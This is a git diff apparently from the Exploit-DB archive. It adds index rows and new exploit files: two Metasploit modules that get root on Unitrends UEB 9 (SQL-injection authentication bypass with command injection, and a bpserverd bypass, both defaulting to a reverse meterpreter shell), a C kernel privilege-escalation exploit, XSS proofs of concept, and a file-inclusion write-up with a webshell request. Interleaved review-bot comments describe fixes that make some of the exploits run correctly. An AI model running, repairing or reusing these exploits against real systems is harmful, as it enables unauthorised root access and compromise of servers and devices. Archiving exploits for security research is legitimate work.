@@ -12571,7 +12573,7 @@ id,file,description,date,author,platform,type,port 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0 -21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 +21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 20966,platforms/solaris/remote/20966.c,"Netscape PublishingXPert 2.0/2.2/2.5 - Local File Reading",2000-04-06,"\x00\x00",solaris,remote,0 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0 
@@ -12718,7 +12720,7 @@ id,file,description,date,author,platform,type,port 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 -21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 +21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 
@@ -15097,7 +15099,7 @@ id,file,description,date,author,platform,type,port 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0 -35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 +35427,platforms/bsd/remote/35427.py,"tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit",2014-12-02,dash,bsd,remote,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - '.m3u' Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Authenticated Remote TCP Stack Buffer Overflow (Metasploit)",2014-12-02,Metasploit,multiple,remote,655 
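Review bot: the renamed description for 35427 in this hunk, "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit", carries a typo ("Eide" for "Side") and names tnftp twice, once as the product and once as the quoted component. Suggest "tnftp (FreeBSD 8/9/10) - Client-Side Exploit", which matches the product-then-quoted-component convention the rest of this commit applies to the other BSD rows.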
@@ -15917,6 +15919,10 @@ id,file,description,date,author,platform,type,port 42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0 42996,platforms/ios/remote/42996.txt,"Apple iOS 10.2 (14C92) - Remote Code Execution",2017-10-17,"Google Security Research",ios,remote,0 43008,platforms/java/remote/43008.rb,"Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)",2017-10-17,Metasploit,java,remote,0 +43025,platforms/windows/remote/43025.py,"Ayukov NFTP FTP Client < 2.0 - Buffer Overflow",2017-10-21,"Berk Cem Göksel",windows,remote,0 +43030,platforms/lin_x86/remote/43030.rb,"Unitrends UEB 9 - http api/storage Remote Root (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,443 +43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743 +43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 
@@ -22417,7 +22423,7 @@ id,file,description,date,author,platform,type,port 9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9890,platforms/php/webapps/9890.txt,"Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla! Component Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 -9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 +9892,platforms/php/webapps/9892.txt,"Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0 
@@ -30807,7 +30813,7 @@ id,file,description,date,author,platform,type,port 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - '/smumdadotcom_ascyb_alumni/mod.php?katalog Module query' Cross-Site Scripting",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - 'mod.php?mod' Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - 'Cat' Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 -28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 +28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 - 'editzonetemplate?template' Cross-Site Scripting",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script - Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x - 'Waka.php' Multiple HTML Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 
@@ -32055,7 +32061,7 @@ id,file,description,date,author,platform,type,port 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 -30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 +30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 
@@ -38712,7 +38718,11 @@ id,file,description,date,author,platform,type,port 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0 +43023,platforms/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0 43018,platforms/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps,0 43019,platforms/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps,0 43021,platforms/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps,0 43022,platforms/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code Exploit",2017-10-17,"Fidus InfoSecurity",hardware,webapps,0 +43024,platforms/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps,0 +43027,platforms/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps,0 +43028,platforms/php/webapps/43028.py,"Kaltura < 13.1.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps,0 diff --git a/platforms/hardware/webapps/43023.txt b/platforms/hardware/webapps/43023.txt new file mode 100755 index 000000000..f7dd4c996 --- /dev/null +++ b/platforms/hardware/webapps/43023.txt 
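Review bot: the new 43023 row is inserted directly after 43015 and ahead of 43018, 43019, 43021 and 43022, which breaks the ascending-id order this section of files.csv otherwise keeps; move it below 43022, where the other three additions in this hunk (43024, 43027, 43028) already sit. The 43028 row also says "Kaltura < 13.1.0" while the header of platforms/php/webapps/43028.py in this same commit says "Kaltura <= 13.1.0"; one of the two should be corrected so the affected range is unambiguous.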
@@ -0,0 +1,25 @@ +# Exploit Title: Vulnerability Xss - TP-LINK TL-MR3220 +# Date: 12/10/2017 +# Exploit Author: Thiago "THX" Sena +# Vendor Homepage: http://www.tp-link.com.br +# Version: TL-MR3220 +# Tested on: Windows 10 +# CVE : CVE-2017-15291 + +Vulnerabilty: Cross-site scripting (XSS) in TP-LINK TL-MR3220 +cve: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15291 +--------------------------------------------------------------- + +PoC: + +0x01 - First you go to ( http://IP:PORT/ ) + +0x02 - In the 'Wireless MAC Filtering' tab. + +0x03 - Will add a new MAC Address. + +0x04 - In 'Description' it will put the script ( ) and complete the registration. + +0x05 - Xss Vulnerability + +-------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/lin_x86/remote/43030.rb b/platforms/lin_x86/remote/43030.rb new file mode 100755 index 000000000..3f07dbbac --- /dev/null +++ b/platforms/lin_x86/remote/43030.rb 
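Review bot: step 0x04 of the PoC in platforms/hardware/webapps/43023.txt has lost its payload ("it will put the script ( )" contains empty parentheses), so the file as committed never says what is entered in the Description field and the finding cannot be reproduced or verified from it; markup in angle brackets is often dropped when text is pasted through a web form, so the submitter should re-check the original. Either restore the tested string or add a request/response capture as platforms/multiple/webapps/43024.txt does in this commit. The "Version:" header gives the model name (TL-MR3220) rather than a firmware build, so the affected firmware versions are not documented anywhere in the file, and "Vulnerabilty" is a typo.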
@@ -0,0 +1,93 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB 9 http api/storage remote root', + 'Description' => %q{ + It was discovered that the api/storage web interface in Unitrends Backup (UB) + before 10.0.0 has an issue in which one of its input parameters was not validated. + A remote attacker could use this flaw to bypass authentication and execute arbitrary + commands with root privilege on the target system. + }, + 'Author' => + [ + 'Cale Smith', # @0xC413 + 'Benny Husted', # @BennyHusted + 'Jared Arave' # @iotennui + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'], + ['CVE', '2017-12478'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => true + }, + 'DisclosureDate' => 'Aug 8 2017', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]) + ]) + deregister_options('SRVHOST', 'SRVPORT') + end + + #substitue some charactes + def filter_bad_chars(cmd) + cmd.gsub!("\\", "\\\\\\") + cmd.gsub!("'", '\\"') + end + + def execute_command(cmd, opts = {}) + session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass + session = Base64.strict_encode64(session) #b64 encode session token + + #substitue the cmd into the hostname parameter + parms = 
%Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + + + res = send_request_cgi({ + 'uri' => '/api/storage', + 'method' => 'POST', + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => parms, + 'headers' => + {'AuthToken' => session} + }) + + if res && res.code != 500 + fail_with(Failure::UnexpectedReply,'Unexpected response') + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 120) + end +end \ No newline at end of file diff --git a/platforms/lin_x86/remote/43031.rb b/platforms/lin_x86/remote/43031.rb new file mode 100755 index 000000000..63ff6d507 --- /dev/null +++ b/platforms/lin_x86/remote/43031.rb 
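Review bot: filter_bad_chars in platforms/lin_x86/remote/43030.rb returns the value of its last gsub! call, and gsub! returns nil when nothing was substituted, so `parms << filter_bad_chars(cmd)` raises a TypeError for any command without a single quote; end the method with an explicit `cmd` (or use non-bang gsub and return the result). The module also has no check method, unlike 43031.rb in the same commit, so there is no way to assess a host without running the exploit. The Description says "Unitrends Backup (UB) before 10.0.0" while Name and Targets say "UEB 9", so the affected-version wording should be aligned. Minor: "substitue" and "charactes" in the comments are misspelled, and 'SSL' is registered a second time via OptBool although the HttpClient mixin already provides that option.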
@@ -0,0 +1,119 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE', + 'Description' => %q{ + It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, + has an issue in which its authentication can be bypassed. A remote attacker could use this + issue to execute arbitrary commands with root privilege on the target system. + }, + 'Author' => + [ + 'Jared Arave', # @iotennui + 'Cale Smith', # @0xC413 + 'Benny Husted' # @BennyHusted + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86], + 'CmdStagerFlavor' => [ 'printf' ], + 'References' => + [ + ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'], + ['CVE', '2017-12477'], + ], + 'Targets' => + [ + [ 'UEB 9.*', { } ] + ], + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, + 'DisclosureDate' => 'Aug 8 2017', + 'DefaultTarget' => 0)) + register_options([ + Opt::RPORT(1743) + ]) + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') + end + + def check + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + #parse out the bpd port returned + bpd_port = buf1[-8..-3].to_i + + #check if it's a valid port number (1-65534) + if bpd_port && bpd_port >= 1 && bpd_port <= 65535 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + end + + def execute_command(cmd, opts = {}) + + #append a comment, ignore everything after our cmd + cmd = cmd + " #" + + # build the attack buffer... 
+ command_len = cmd.length + 3 + packet_len = cmd.length + 23 + data = "\xa5\x52\x00\x2d" + data << "\x00\x00\x00" + data << packet_len + data << "\x00\x00\x00" + data << "\x01" + data << "\x00\x00\x00" + data << "\x4c" + data << "\x00\x00\x00" + data << command_len + data << cmd + data << "\x00\x00\x00" + + begin + print_status("Connecting to xinetd for bpd port...") + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + + #parse out the bpd port returned, we will connect back on this port to send our cmd + bpd_port = buf1[-8..-3].to_i + + print_good("bpd port recieved: #{bpd_port}") + vprint_status("Connecting to #{bpd_port}") + + s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) + vprint_good('Connected!') + + print_status('Sending command buffer to xinetd') + + s1.put(data) + s2.get_once(-1,1).to_s + + disconnect(s1) + disconnect(s2) + + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + fail_with(Failure::Unreachable, "#{peer} - Connection to server failed") + end + + end + + def exploit + print_status("#{peer} - pwn'ng ueb 9....") + execute_cmdstager(:linemax => 200) + end +end \ No newline at end of file diff --git a/platforms/linux/local/43029.c b/platforms/linux/local/43029.c new file mode 100755 index 000000000..041e9a163 --- /dev/null +++ b/platforms/linux/local/43029.c 
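Review bot: in execute_command of platforms/lin_x86/remote/43031.rb the two length fields are appended with `data << packet_len` and `data << command_len`, and String#<< with an Integer appends the character with that codepoint in the string's encoding rather than a raw byte, so values of 128 and above can become multi-byte sequences and corrupt the framing (linemax is 200 here, so packet_len can exceed that bound). Use `[packet_len].pack('C')` and `[command_len].pack('C')`, or whatever width the protocol actually expects, so the byte is explicit regardless of encoding. In check, the comment says the valid range is 1-65534 but the test accepts up to 65535; the two should agree. Minor: "recieved" is a typo.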
@@ -0,0 +1,127 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include + +struct cred; +struct task_struct; + +typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3))); +typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3))); + +prepare_kernel_cred_t prepare_kernel_cred; +commit_creds_t commit_creds; + +void get_shell() { + char *argv[] = {"/bin/sh", NULL}; + + if (getuid() == 0){ + printf("[+] Root shell success !! :)\n"); + execve("/bin/sh", argv, NULL); + } + printf("[-] failed to get root shell :(\n"); +} + +void get_root() { + if (commit_creds && prepare_kernel_cred) + commit_creds(prepare_kernel_cred(0)); +} + +unsigned long get_kernel_sym(char *name) +{ + FILE *f; + unsigned long addr; + char dummy; + char sname[256]; + int ret = 0; + + f = fopen("/proc/kallsyms", "r"); + if (f == NULL) { + printf("[-] Failed to open /proc/kallsyms\n"); + exit(-1); + } + printf("[+] Find %s...\n", name); + while(ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + printf("[+] Found %s at %lx\n", name, addr); + return addr; + } + } + fclose(f); + return 0; +} + +int main(int ac, char **av) +{ + if (ac != 2) { + printf("./exploit kernel_offset\n"); + printf("exemple = 0xffffffff81f3f45a"); + return EXIT_FAILURE; + } + + // 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions + prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred"); + commit_creds = (commit_creds_t)get_kernel_sym("commit_creds"); + // have_canfork_callback offset <= rendre dynamique aussi + + pid_t pid; + /* siginfo_t info; */ + + // 1 - Mapper la mmoire l'adresse 0x0000000000000000 + printf("[+] Try to allocat 0x00000000...\n"); + if (mmap(0, 4096, 
PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){ + printf("[-] Failed to allocat 0x00000000\n"); + return -1; + } + printf("[+] Allocation success !\n"); + /* memset(0, 0xcc, 4096); */ +/* +movq rax, 0xffffffff81f3f45a +movq [rax], 0 +mov rax, 0x4242424242424242 +call rax +xor rax, rax +ret +replace 0x4242424242424242 by get_root +https://defuse.ca/online-x86-assembler.htm#disassembly + */ + unsigned char shellcode[] = + { 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 }; + void **get_root_offset = rawmemchr(shellcode, 0x42); + (*get_root_offset) = get_root; + + memcpy(0, shellcode, sizeof(shellcode)); + /* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */ + + if(-1 == (pid = fork())) { + perror("fork()"); + return EXIT_FAILURE; + } + + if(pid == 0) { + _exit(0xDEADBEEF); + perror("son"); + return EXIT_FAILURE; + } + + siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0); + waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED); + +// TRIGGER + pid = fork(); + printf("fork_ret = %d\n", pid); + if (pid > 0) + get_shell(); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/platforms/multiple/webapps/43024.txt b/platforms/multiple/webapps/43024.txt new file mode 100755 index 000000000..daeb22ebd --- /dev/null +++ b/platforms/multiple/webapps/43024.txt 
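Review bot: the seven #include lines at the top of platforms/linux/local/43029.c are empty (the header names are missing, most likely stripped together with their angle brackets on submission), so the file as committed does not compile; from the calls in the body (printf, fscanf, perror, exit, strtoul, memcpy, rawmemchr, getuid, execve, fork, _exit, mmap, waitid, siginfo_t) at least stdio.h, stdlib.h, string.h, unistd.h, sys/mman.h, sys/wait.h and signal.h are needed. The file also has no exploit-db header block (title, author, date, CVE, tested kernel version), so the affected kernel versions and distribution are recorded nowhere in the commit. Several comments are in French and should be English like the rest of the archive, and the address 0xffffffff81f3f45a hard-coded into the shellcode is tied to one kernel build while the usage text calls the argument "kernel_offset" even though main passes it as the siginfo pointer to waitid; both should be documented.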
@@ -0,0 +1,43 @@ +# Exploit Title: DOM Based Cross Site Scripting (XSS) - Logitech Media Server +# Shodan Dork: Logitech Media Server +# Date: 14/10/2017 +# Exploit Author: Thiago "THX" Sena +# Vendor Homepage: https://www.logitech.com +# Tested on: windows 10 +# CVE : CVE-2017-15687 + +----------------------------------------------- + +PoC: + +- First you go to ( http://IP:PORT/ ) + +- Then put the script ( ) + +- ( http://IP:PORT/ ) + +- Xss Vulnerability + +--------------------------------------------------- + +[Versões Afetadas] + +7.7.3 +7.7.5 +7.9.1 +7.7.2 +7.7.1 +7.7.6 +7.9.0 + + +[Request] + +GET /%3Cbody%20onload=alert('Xss')%3E HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: Squeezebox-expandPlayerControl=true; Squeezebox-expanded-MY_MUSIC=0; Squeezebox-expanded-RADIO=0; Squeezebox-expanded-PLUGIN_MY_APPS_MODULE_NAME=0; Squeezebox-expanded-FAVORITES=0; Squeezebox-expanded-PLUGINS=0 +Connection: close +Upgrade-Insecure-Requests: 1 diff --git a/platforms/php/webapps/43027.txt b/platforms/php/webapps/43027.txt new file mode 100755 index 000000000..f9fa7feec --- /dev/null +++ b/platforms/php/webapps/43027.txt 
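Review bot: the PoC steps in platforms/multiple/webapps/43024.txt have lost their payload ("Then put the script ( )" has empty parentheses), so the only reproducible detail is the GET line in the [Request] block; the steps should point at that request or be dropped. The section header "[Versões Afetadas]" is Portuguese ("Affected versions") and should be in English like the rest of the file, the version list is unordered (7.7.3, 7.7.5, 7.9.1, 7.7.2, ...), and no fixed version is stated. Minor: "Tested on: windows 10" should be capitalised.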
@@ -0,0 +1,60 @@ +# Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion +# Date: 2017-10-22 +# Exploit Author: Luke Paris (Paradoxis) +# Vendor Homepage: https://cometchat.com/ +# Version: < 6.2.0 BETA 1 +# Tested on: Ubuntu Linux 14.04 +# +# -------------------------------------------------------------------------------------- +# +# In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed +# any unauthorised attacker to modify the include path of a php file by sending an +# HTTP request with a crafted 'cc_lang' cookie. +# +# If successfully exploited an attacker could leverage this bug to execute arbitrary PHP +# code which resides somewhere else on the server (eg: uploaded via an upload form). +# +# Due to the fact that this bug resides in the configuration file of the applications +# it might be possible that future versions of the chat application still contain the +# file inclusion bug as the script might have been re-applied after an update. +# +# -------------------------------------------------------------------------------------- +# +# The vulnerability resides in the application's configuration file, near the beginning +# of the script the following code block is executed, this is where an attacker is able +# to inject a string into the cc_lang cookie. + +/* COOKIE */ +$cookiePrefix = 'cc_'; + +/* LANGUAGE START */ +$lang = 'en'; + +/* LANGUAGE END */ +if (!empty($_COOKIE[$cookiePrefix."lang"])) { + $lang = $_COOKIE[$cookiePrefix."lang"]; +} + +# Near the end of the configuration file, the following code block is executed. +# This is where the exploit is triggered by not sanitising the $lang variable properly. 
+ +include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php'; +if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) { + include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php'; +} + +# The following example demonstrates how an attacker could leverage this bug to gain control +# over the server, which could result in a full server compromise (assuming the attacker has +# already managed to write a webshell to the servers' disk somehow): + +GET /cometchat/config.php?cmd=id HTTP/1.1 +Host: example.com +Connection: keep-alive +Cookie: cc_lang=../../uploads/evil + +HTTP/1.1 200 OK +Host: example.com +Connection: close +Content-type: text/html; charset=UTF-8 + +uid=33(www-data) gid=33(www-data) groups=33(www-data) diff --git a/platforms/php/webapps/43028.py b/platforms/php/webapps/43028.py new file mode 100755 index 000000000..224ebd5f2 --- /dev/null +++ b/platforms/php/webapps/43028.py 
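Review bot: the write-up in platforms/php/webapps/43027.txt shows the root cause clearly (the cc_lang cookie flows unchecked into an include path, guarded only by file_exists and a fixed '.php' suffix), but it never states what the fix is or confirms in the body that 6.2.0 BETA 1 resolves it; adding that, together with the correct remediation (accept $lang only from a fixed allow-list of language codes, or reject any value containing a path separator or '..'), would make the advisory actionable for anyone who re-applied an old config.php after updating, which the text itself warns about. Minor: the header says "v6.2.0 BETA 1" while the files.csv row in this commit says "6.2.0 BETA 1".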
